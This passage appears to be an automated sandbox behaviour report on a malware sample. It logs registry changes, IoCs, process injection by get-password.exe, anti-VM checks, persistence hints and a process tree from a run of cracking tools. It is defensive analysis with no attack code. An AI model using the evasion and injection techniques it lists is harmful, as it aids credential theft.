Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Aura_protected.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\WOW6432Node\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16"	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg	Aura_protected.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\Shell\SniffedFolderType = "Downloads"	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg	Aura_protected.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\MRUListEx = 00000000ffffffff	Aura_protected.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202	Aura_protected.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1"	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\2\0\0	Aura_protected.exe
Key created	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	Aura_protected.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	Aura_protected.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff	Aura_protected.exe

NTFS ADS 3 IoCs

Processes:

firefox.exe

description	ioc	process
File created	C:\Users\Admin\Downloads\AURA__AIO_CHECKER__30_Modules.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Woxy 3.0+166 Config updated 2023.zip:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Cracking Pack.zip:Zone.Identifier	firefox.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

Payload.exe

pid process

1404 Payload.exe

pid	process
1404	Payload.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

get-password.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
1652	get-password.exe
6492	powershell.exe
6492	powershell.exe
6492	powershell.exe
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe
6428	powershell.exe
6428	powershell.exe
6604	powershell.exe
6604	powershell.exe
7284	powershell.exe
7284	powershell.exe
6428	powershell.exe
6428	powershell.exe
7440	powershell.exe
7440	powershell.exe
6604	powershell.exe
7284	powershell.exe
7440	powershell.exe
7608	powershell.exe
7608	powershell.exe
7608	powershell.exe
7532	powershell.exe
7532	powershell.exe
7532	powershell.exe
7112	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

Aura_protected.exeGather Proxy.exeuProxy Tool.exe

pid process

6724 Aura_protected.exe
1524 Gather Proxy.exe
6672 uProxy Tool.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

msedge.exe

pid process

7712 msedge.exe
7712 msedge.exe
7712 msedge.exe

pid	process
6724	Aura_protected.exe
1524	Gather Proxy.exe
6672	uProxy Tool.exe

pid	process
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

firefox.exe7zG.exe7zG.exeAura_protected.exepowershell.exepowershell.exepowershell.exetasklist.exepowershell.exetasklist.exeWMIC.exepowershell.exetasklist.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2896	firefox.exe
Token: SeDebugPrivilege	2896	firefox.exe
Token: SeDebugPrivilege	2896	firefox.exe
Token: SeDebugPrivilege	2896	firefox.exe
Token: SeDebugPrivilege	2896	firefox.exe
Token: SeDebugPrivilege	2896	firefox.exe
Token: SeRestorePrivilege	4180	7zG.exe
Token: 35	4180	7zG.exe
Token: SeSecurityPrivilege	4180	7zG.exe
Token: SeSecurityPrivilege	4180	7zG.exe
Token: SeDebugPrivilege	2896	firefox.exe
Token: SeRestorePrivilege	4912	7zG.exe
Token: 35	4912	7zG.exe
Token: SeSecurityPrivilege	4912	7zG.exe
Token: SeSecurityPrivilege	4912	7zG.exe
Token: SeDebugPrivilege	6060	Aura_protected.exe
Token: SeDebugPrivilege	6492	powershell.exe
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeDebugPrivilege	6428	powershell.exe
Token: SeDebugPrivilege	6500	tasklist.exe
Token: SeDebugPrivilege	6604	powershell.exe
Token: SeDebugPrivilege	6376	tasklist.exe
Token: SeIncreaseQuotaPrivilege	7368	WMIC.exe
Token: SeSecurityPrivilege	7368	WMIC.exe
Token: SeTakeOwnershipPrivilege	7368	WMIC.exe
Token: SeLoadDriverPrivilege	7368	WMIC.exe
Token: SeSystemProfilePrivilege	7368	WMIC.exe
Token: SeSystemtimePrivilege	7368	WMIC.exe
Token: SeProfSingleProcessPrivilege	7368	WMIC.exe
Token: SeIncBasePriorityPrivilege	7368	WMIC.exe
Token: SeCreatePagefilePrivilege	7368	WMIC.exe
Token: SeBackupPrivilege	7368	WMIC.exe
Token: SeRestorePrivilege	7368	WMIC.exe
Token: SeShutdownPrivilege	7368	WMIC.exe
Token: SeDebugPrivilege	7368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7368	WMIC.exe
Token: SeRemoteShutdownPrivilege	7368	WMIC.exe
Token: SeUndockPrivilege	7368	WMIC.exe
Token: SeManageVolumePrivilege	7368	WMIC.exe
Token: 33	7368	WMIC.exe
Token: 34	7368	WMIC.exe
Token: 35	7368	WMIC.exe
Token: 36	7368	WMIC.exe
Token: SeDebugPrivilege	7284	powershell.exe
Token: SeDebugPrivilege	7396	tasklist.exe
Token: SeDebugPrivilege	7440	powershell.exe
Token: SeIncreaseQuotaPrivilege	7368	WMIC.exe
Token: SeSecurityPrivilege	7368	WMIC.exe
Token: SeTakeOwnershipPrivilege	7368	WMIC.exe
Token: SeLoadDriverPrivilege	7368	WMIC.exe
Token: SeSystemProfilePrivilege	7368	WMIC.exe
Token: SeSystemtimePrivilege	7368	WMIC.exe
Token: SeProfSingleProcessPrivilege	7368	WMIC.exe
Token: SeIncBasePriorityPrivilege	7368	WMIC.exe
Token: SeCreatePagefilePrivilege	7368	WMIC.exe
Token: SeBackupPrivilege	7368	WMIC.exe
Token: SeRestorePrivilege	7368	WMIC.exe
Token: SeShutdownPrivilege	7368	WMIC.exe
Token: SeDebugPrivilege	7368	WMIC.exe
Token: SeSystemEnvironmentPrivilege	7368	WMIC.exe
Token: SeRemoteShutdownPrivilege	7368	WMIC.exe
Token: SeUndockPrivilege	7368	WMIC.exe
Token: SeManageVolumePrivilege	7368	WMIC.exe
Token: 33	7368	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

firefox.exe7zG.exe7zG.exemsedge.exe7zG.exe7zG.exe7zG.exe7zG.exeKidux Proxy Scraper v1.0.2.exe7zG.exe7zG.exe

pid	process
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
4180	7zG.exe
4912	7zG.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
6932	7zG.exe
5772	7zG.exe
372	7zG.exe
5876	7zG.exe
3676	Kidux Proxy Scraper v1.0.2.exe
1036	7zG.exe
6256	7zG.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe

Suspicious use of SendNotifyMessage 56 IoCs

Processes:

firefox.exemsedge.exe

pid	process
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
7712	msedge.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe

Suspicious use of SetWindowsHookEx 41 IoCs

Processes:

firefox.exeAura_protected.exeAura_protected.exeOpenWith.exeOpenWith.exeSQLi Dumper.exeOpenWith.exe

pid	process
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
6724	Aura_protected.exe
6724	Aura_protected.exe
6724	Aura_protected.exe
6724	Aura_protected.exe
6724	Aura_protected.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2896	firefox.exe
2272	Aura_protected.exe
2272	Aura_protected.exe
2272	Aura_protected.exe
1680	OpenWith.exe
5616	OpenWith.exe
6204	SQLi Dumper.exe
6204	SQLi Dumper.exe
5016	OpenWith.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

get-password.exetrsfsdfr.exefirefox.exefirefox.exe

description	pid	process	target process
PID 1652 wrote to memory of 5072	1652	get-password.exe	trsfsdfr.exe
PID 1652 wrote to memory of 5072	1652	get-password.exe	trsfsdfr.exe
PID 5072 wrote to memory of 4368	5072	trsfsdfr.exe	trsfsdfr.exe
PID 5072 wrote to memory of 4368	5072	trsfsdfr.exe	trsfsdfr.exe
PID 4244 wrote to memory of 2896	4244	firefox.exe	firefox.exe
PID 4244 wrote to memory of 2896	4244	firefox.exe	firefox.exe
PID 4244 wrote to memory of 2896	4244	firefox.exe	firefox.exe
PID 4244 wrote to memory of 2896	4244	firefox.exe	firefox.exe
PID 4244 wrote to memory of 2896	4244	firefox.exe	firefox.exe
PID 4244 wrote to memory of 2896	4244	firefox.exe	firefox.exe
PID 4244 wrote to memory of 2896	4244	firefox.exe	firefox.exe
PID 4244 wrote to memory of 2896	4244	firefox.exe	firefox.exe
PID 4244 wrote to memory of 2896	4244	firefox.exe	firefox.exe
PID 4244 wrote to memory of 2896	4244	firefox.exe	firefox.exe
PID 4244 wrote to memory of 2896	4244	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 4528	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 3372	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 3372	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 3372	2896	firefox.exe	firefox.exe
PID 2896 wrote to memory of 3372	2896	firefox.exe	firefox.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\get-password.exe
"C:\Users\Admin\AppData\Local\Temp\get-password.exe"
1⤵
- Looks for VMWare Tools registry key
- Enumerates connected drives
- Checks for VirtualBox DLLs, possible anti-VM trick
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1652
- C:\Users\Admin\AppData\Local\Temp\trsfsdfr.exe
  "C:\Users\Admin\AppData\Local\Temp\trsfsdfr.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5072
- - C:\Users\Admin\AppData\Local\Temp\trsfsdfr.exe
    "C:\Users\Admin\AppData\Local\Temp\trsfsdfr.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:4368

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4244
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2896
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1984 -parentBuildID 20240401114208 -prefsHandle 1912 -prefMapHandle 1904 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d53f2753-4eb2-425b-958e-8f9a9642eece} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" gpu
    3⤵
    PID:4528
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2396 -parentBuildID 20240401114208 -prefsHandle 2372 -prefMapHandle 2368 -prefsLen 23716 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c195aeb1-4bb3-443a-9b7f-cf2e47d33a79} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" socket
    3⤵
    PID:3372
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3252 -childID 1 -isForBrowser -prefsHandle 3228 -prefMapHandle 3240 -prefsLen 23857 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {21ecfc9e-2f38-4d6f-a482-725516c3753d} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:3120
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3712 -childID 2 -isForBrowser -prefsHandle 3700 -prefMapHandle 3640 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ce9b556-4f9b-472e-9657-7ff8f7f6582a} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:3308
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4844 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4840 -prefMapHandle 4832 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d1ed302-e56e-45e6-8b58-ff27362e0cb8} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" utility
    3⤵
    - Checks processor information in registry
    PID:5276
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5336 -childID 3 -isForBrowser -prefsHandle 5356 -prefMapHandle 5352 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {687d127a-9735-4ac3-887e-82026d8356fb} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:5736
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5492 -childID 4 -isForBrowser -prefsHandle 5500 -prefMapHandle 5504 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {52deb7da-6077-4f35-9f3f-fc4e6c85d6c4} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:5748
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5684 -childID 5 -isForBrowser -prefsHandle 5692 -prefMapHandle 5696 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e44e57a7-a3c3-4ae6-a277-61290e548c1d} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:5760
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5668 -childID 6 -isForBrowser -prefsHandle 5752 -prefMapHandle 5368 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c3da87ab-9655-461f-8802-f6754f7cfc1e} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:1724
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6016 -childID 7 -isForBrowser -prefsHandle 6164 -prefMapHandle 5032 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a3eded90-d2c8-44f8-9f81-d17015ee9a26} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:4724
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5352 -childID 8 -isForBrowser -prefsHandle 5816 -prefMapHandle 5832 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {88d32091-2f3b-4d3d-8c7a-68da25fc5720} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:856
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5920 -childID 9 -isForBrowser -prefsHandle 5692 -prefMapHandle 6312 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d394b2e5-5ec4-4e5c-b17f-fd0f63d5250a} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:5552
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6656 -childID 10 -isForBrowser -prefsHandle 6664 -prefMapHandle 6668 -prefsLen 27998 -prefMapSize 244658 -jsInitHandle 1248 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7bc528ca-cd37-408b-b1e9-a72fafdc4079} 2896 "\\.\pipe\gecko-crash-server-pipe.2896" tab
    3⤵
    PID:2028
- - C:\Program Files\Mozilla Firefox\firefox.exe
